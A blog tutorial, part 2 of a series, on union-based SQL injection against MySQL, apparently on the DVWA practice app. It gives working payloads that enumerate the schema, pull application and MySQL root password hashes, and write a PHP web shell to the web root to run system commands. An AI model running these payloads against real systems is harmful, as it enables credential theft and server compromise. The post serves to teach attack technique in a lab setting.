Tuesday, October 18, 2011

Basic SQL Injection on MYSQL part 2

In this post we will continue to enumerate the database through the use of the Union statement. We will use the union statement to poison the results being given back to us because we cannot use stacked queries in a MySQL/PHP environment. A stacked query is simply closing off the first query and creating our own from scratch and appending it to the original one. In our case it would look something like this:

'; Select user from mysql.user;#

As you can see we would end the original query with the semi-colon and would then be able to redirect the query to basically anything we wanted. But as I said we are not able to do that in this scenario.

The first step would be to determine how many columns we must put in our query to make the database happy. Since we have already done that in the previous post, we know that the original query has two columns. Therefore all of our enumeration must be done with only two columns per query. Lets start by trying to dump the database schema piece by piece. We can do this by accessing the information_Schema database. Our query would look like this:

' union all select schema_name,table_name from information_schema;#

Awesome. We are able to see the schema_names (or database names) as well as each table name. When enumerating a database we want to drill down into the rows in this order


Now that we have the databases and tables, lets clean our results up a little bit and also get specific columns from interesting tables.

' union all select concat( table_schema,':' ,table_name), column_name from information_schema.columns where column_name like '%pass%';#

Now then, that is much cleaner. What the previous injection does is asks for the database names and the table names concatenated as the first column, then column names as the second column, from any column that includes the letters 'pass'. We do this by using the LIKE SQL command. Remember, once sql injection is confirmed, you are usually only limited by your knowledge of the SQL language. You are able to use any SQL command since you are talking straight to the database. As you can see we have pulled 3 columns all named password. One being out of the dvwa database and the other two out of the mysql database. Lets go ahead and explore the dvwa database and see if we cant extract the users and passwords for the application we are using.

' union all select user, password from users;#

The results are truly a beautiful thing to behold. A list of usernames and hashed password, also know as the jackpot. All we would need to do at this point is point our trusty John the Ripper password cracker at these MD5 hashes and wait for the results to have full admin access to this web application. That is fine and dandy but I am a greedy bad guy and I want to see if I can compromise the MYSQL database as well as the underlying operating system. Lets go after the MYSQL database first.

' union all select user, password from mysql.users;#

Bingo. Not only did we get the root account hash, we also got a hash from a "pma" user. This is most likely going to be the PHPmyAdmin account in the database.

On to the OS. For attacking the underlying operating system, we will use a very simple php shell to give us the ability to run commands on the OS.

' union select "<? system($_REQUEST['cmd']); ?>",2 into outfile "/opt/lampp/htdoc/temp/badguy.php" ;#

This command requires that we have write access to a directory that is public on the webserver. In this case we are writing to the directory temp, a file called badguy.php. We are writing a simple php command to this file so that we are able to pass commands through the browser to the underlying operating system.

Now we need to enter into our browser the following: -a

Awesome! We are able to issue operating system commands and we can see that this is a Debian server as well as what kernel version. At this point we would try and figure out a way to escalate privileges. G0tmi1k has a great compilation of commands to help map out an unknown OS


For a really great presentation on union poisoning go here : Understanding MySQL poisoning

That is all for this post. Hope you are able to see just how much damage a SQL injection attack can allow.


No comments:

Post a Comment